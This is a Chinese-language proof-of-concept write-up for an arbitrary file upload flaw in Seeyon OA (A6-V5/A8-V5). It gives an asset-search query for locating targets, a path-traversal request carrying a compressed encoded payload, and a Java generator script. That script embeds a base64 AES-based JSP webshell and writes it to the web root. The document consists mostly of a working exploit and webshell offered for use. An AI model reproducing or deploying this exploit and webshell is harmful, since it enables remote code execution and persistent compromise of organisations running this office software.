致远OA ajax.do存在任意文件上传漏洞
一、漏洞简介
致远OA办公自动化软件,用于OA办公自动化软件的开发销售。2010年,用友致远更名为致远协创。2017年更名为致远互联。北京致远互联软件股份有限公司(简称:致远互联)成立于2002年3月,总部设立在北京,是一家集协同办公产品的设计、研发、销售及服务为一体的企业。致远OA ajax.do存在任意文件上传漏洞
二、影响版本
- 致远OA A6-V5
- 致远OA A8-V5
三、资产测绘
- hunter
app.name="致远 OA" - 特征
四、漏洞复现
通过以下请求判断可能存在漏洞
/seeyon/thirdpartyController.do.css/..;/ajax.do
POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1
Host:
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
loginPageURL=; login_locale=zh_CN;
Content-Type: application/x-www-form-urlencoded
Content-Length: 1130
managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uQ%C3%81N%C3%830%0C%3D%C3%83WX%C2%BD%C2%B4%15%23%1D%08%21%C3%84%C3%94%03%C2%83%21N%08%C2%B4%C2%B1%09%10%C2%87%C2%ACuYP%C3%9BD%C2%8D%C3%8B%3AU%C3%BB%C3%B7%C2%A5K%C2%A1%C2%95%18%C2%B9%3C%C3%BB%C3%85%7E%7E%C2%89%C3%9Fk7%C2%91EV%C2%A6%7C%C2%B6Q%C3%A8%5E%C3%83%C3%99%00%7E%C2%98G%C2%9E5%C2%8CK%C2%A8%C3%89%C3%AD%C3%A8I%C2%A5%0A%C3%94Z%C3%88%C2%BC%C2%B9%C2%9CR%21%C3%B2OP%C2%9CV%10%C2%82%C3%83X%C2%B0%C3%86%25WJ%07%1Aq%23%C3%B3%C3%80%19%1D%C2%83%3DG_%C3%BC%C2%9B3%21%C3%99%C2%93i%C2%A1E%21%08%0BP%5D%7Cn%04r%5C%C3%83%C2%812%C2%AF%C3%91%3Fq%C3%A22S%C2%8C*r%C3%BC_Qh%0D%C3%A8%15%C2%A6i%C3%A3%C3%A0%C3%ADaN%C3%91%C3%AD%C2%90%C2%96%C2%8B%C3%B9%C3%B0%C3%B59%0C%C2%BB%C3%B9%C2%A0%C3%8B%C2%9CeBGl%7C3%C2%9D%5C%5E%C3%9Ca%24cc%21n%C3%91N%3F%5C%C3%A4%C3%BD%C2%9Dh%C3%9B%C3%9A%C3%84%C3%B6%C3%9A%C3%84k%05%C2%99%C3%85q%C2%99%24F%60o%C3%90%1F8%2F%C2%B3%C3%BB%C3%93%C2%AB%C3%BE%03%C3%BA%3F%C3%80%C3%B6I%C2%9A%7B%7D%C3%B1%C3%BFj%C2%A3Tj4%C3%86%C2%B6%C2%A3fC%26%C2%881%01M%C2%9CD%04UUy%7E%C3%ADn%C3%8D%C3%9A%C3%8C%C3%AA%C3%AA%06%C2%A9%28%C3%91%C3%BD%C3%98%01E%C3%BB%16h%C3%B1%01%00%00
GET /seeyon/dump.txt HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
shell生成脚本
package com.example.Test;
import com.seeyon.ctp.common.formula.FormulaUtil;
import com.seeyon.ctp.common.log.CtpLogFactory;
import com.seeyon.ctp.common.po.formula.Formula;
import com.seeyon.ctp.common.script.ScriptEvaluator;
import com.seeyon.ctp.util.ZipUtil;
import com.seeyon.ctp.util.json.JSONUtil;
import org.apache.commons.logging.Log;
import java.net.URLEncoder;
import java.util.ArrayList;
import java.util.HashMap;
public class Test {
private static final Log LOGGER = CtpLogFactory.getLog(Test.class);
public static void main(String[] args) throws Exception{
final Formula formula = new Formula();
// if (formula.getFormulaType() != FormulaType.GroovyFunction.getKey() && formula.getFormulaType() != FormulaType.Variable.getKey()) {
formula.setFormulaType(2);
formula.setFormulaName("test");
String payload = "" +
"def filePath = \"../webapps/ROOT/mzr2.j"+"sp\";" +
"java.io.File file = new java.io.File(filePath);" +
"String shell=\"PCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmEuaW8uKixqYXZheC5jcnlwdG8uKixqYXZheC5jcnlwdG8uc3BlYy4qIiU+PCUhY2xhc3MgVSBleHRlbmRzIENsYXNzTG9hZGVyIHsKCQlVKENsYXNzTG9hZGVyIGMpIHsKCQkJc3VwZXIoYyk7CgkJfQoJCXB1YmxpYyBDbGFzcyBnKGJ5dGVbXSBiKSB7CgkJCXJldHVybiBzdXBlci5kZWZpbmVDbGFzcyhiLCAwLCBiLmxlbmd0aCk7CgkJfQoJfSU+CjwlCnRyeXsKCQlTdHJpbmcga2V5PSI5MDBiYzg4NWQ3NTUzMzc1IjsKCQlyZXF1ZXN0LnNldEF0dHJpYnV0ZSgic2t5Iiwga2V5KTsKCQlTdHJpbmcgZGF0YT1yZXF1ZXN0LmdldFJlYWRlcigpLnJlYWRMaW5lKCk7CgkJaWYgKGRhdGEhPSBudWxsKSB7CgkJCVN0cmluZyB2ZXIgPSBTeXN0ZW0uZ2V0UHJvcGVydHkoImphdmEudmVyc2lvbiIpOwoJCQlieXRlW10gY29kZT1udWxsOwoJICAgICAgICBpZiAodmVyLmNvbXBhcmVUbygiMS44IikgPj0gMCkgewoJICAgICAgICAgICAgQ2xhc3MgQmFzZTY0ID0gQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkJhc2U2NCIpOwoJICAgICAgICAgICAgT2JqZWN0IERlY29kZXIgPSBCYXNlNjQuZ2V0TWV0aG9kKCJnZXREZWNvZGVyIiwgKENsYXNzW10pIG51bGwpLmludm9rZShCYXNlNjQsIChPYmplY3RbXSkgbnVsbCk7CgkgICAgICAgICAgICBjb2RlID0gKGJ5dGVbXSkgRGVjb2Rlci5nZXRDbGFzcygpLmdldE1ldGhvZCgiZGVjb2RlIiwgbmV3IENsYXNzW117Ynl0ZVtdLmNsYXNzfSkuaW52b2tlKERlY29kZXIsIG5ldyBPYmplY3RbXXtkYXRhLmdldEJ5dGVzKCJVVEYtOCIpfSk7CgkgICAgICAgIH0gZWxzZSB7CgkgICAgICAgICAgICBDbGFzcyBCYXNlNjQgPSBDbGFzcy5mb3JOYW1lKCJzdW4ubWlzYy5CQVNFNjREZWNvZGVyIik7CgkgICAgICAgICAgICBPYmplY3QgRGVjb2RlciA9IEJhc2U2NC5uZXdJbnN0YW5jZSgpOwoJICAgICAgICAgICAgY29kZSA9IChieXRlW10pIERlY29kZXIuZ2V0Q2xhc3MoKS5nZXRNZXRob2QoImRlY29kZUJ1ZmZlciIsIG5ldyBDbGFzc1tde1N0cmluZy5jbGFzc30pLmludm9rZShEZWNvZGVyLCBuZXcgT2JqZWN0W117ZGF0YX0pOwoJICAgICAgICB9CgkJCUNpcGhlciBjID0gQ2lwaGVyLmdldEluc3RhbmNlKCJBRVMiKTsKCQkJYy5pbml0KDIsIG5ldyBTZWNyZXRLZXlTcGVjKGtleS5nZXRCeXRlcygpLCAiQUVTIikpOwoJCQluZXcgVSh0aGlzLmdldENsYXNzKCkuZ2V0Q2xhc3NMb2FkZXIoKSkuZyhjLmRvRmluYWwoY29kZSkpLm5ld0luc3RhbmNlKCkuZXF1YWxzKHBhZ2VDb250ZXh0KTsKCQl9Cgl9Y2F0Y2goRXhjZXB0aW9uIGUpewp9OwpvdXQ9cGFnZUNvbnRleHQucHVzaEJvZHkoKTsKJT4=\";"+
"sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();" +
"String decodeString = new String(decoder.decodeBuffer(shell),\"UTF-8\");"+
"file << decodeString;};" +
"test();" +
"def static xxx(){";
formula.setFormulaExpression(payload);
final String string = JSONUtil.toJSONString(formula);
// System.out.println(string);
final ArrayList<Object> list = new ArrayList<>();
list.add(formula);
list.add("");
list.add(new HashMap<>());
list.add(true);
final String list1 = JSONUtil.toJSONString(list);
// System.out.println(list1);
String strArgs = ZipUtil.compressResponse(list1, "gzip", "UTF-8", LOGGER);
// System.out.println(strArgs);
System.out.println(URLEncoder.encode(strArgs));
System.out.println("end");
}
}